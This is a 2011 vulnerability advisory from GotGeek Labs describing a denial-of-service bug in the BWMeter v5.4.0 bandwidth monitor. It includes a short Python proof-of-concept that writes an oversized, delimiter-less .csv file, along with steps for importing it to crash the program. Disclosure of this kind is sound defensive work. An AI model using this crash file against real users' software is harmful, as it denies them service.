GotGeek Labs
http://www.gotgeek.com.br/

BWMeter v5.4.0 (.csv) Denial of Service


[+] Description

BWMeter is a powerful bandwidth meter, monitor, traffic controller and
firewall, which measures, displays and controls all traffic to/from your
computer or on your network.


[+] Information

Title: BWMeter v5.4.0 (.csv) Denial of Service
Advisory: gg-002-2011
Date: 02-14-2011
Last update: 02-16-2011
Link: http://www.gotgeek.com.br/pocs/gg-002-2011.txt
Tested on: Windows XP SP3


[+] Vulnerability

BWMeter is affected by a denial of service vulnerability, triggered when a
crafted .csv file is imported through Statistics >> Import.
Successful exploitation of the vulnerability allows an attacker to crash the
vulnerable application, denying service to legitimate users.

Affected Versions:
BWMeter v5.4.0

Other versions may also be vulnerable.


[+] Proof of Concept/Exploit

#!/usr/bin/python
# Creates b0t.csv: 5000 bytes of "G" (0x47) with no delimiters or newlines.

junk = "\x47\x47" * 2500

try:
    # Write the malformed import file to the current directory.
    with open('b0t.csv', 'w') as f:
        f.write(junk)
    print("\n[*] gotgeek labs")
    print("[*] http://gotgeek.com.br\n")
    print("[+] b0t.csv created.")
    print("[+] Open BWMeter.exe...")
    print("[+] Statistics >> Import")
    print("[+] and Select b0t.csv\n")
except IOError:
    print("\n[-] Error.. Can't write file to system.\n")


[+] References

http://www.desksoft.com/BWMeter.htm


[+] Credits

b0telh0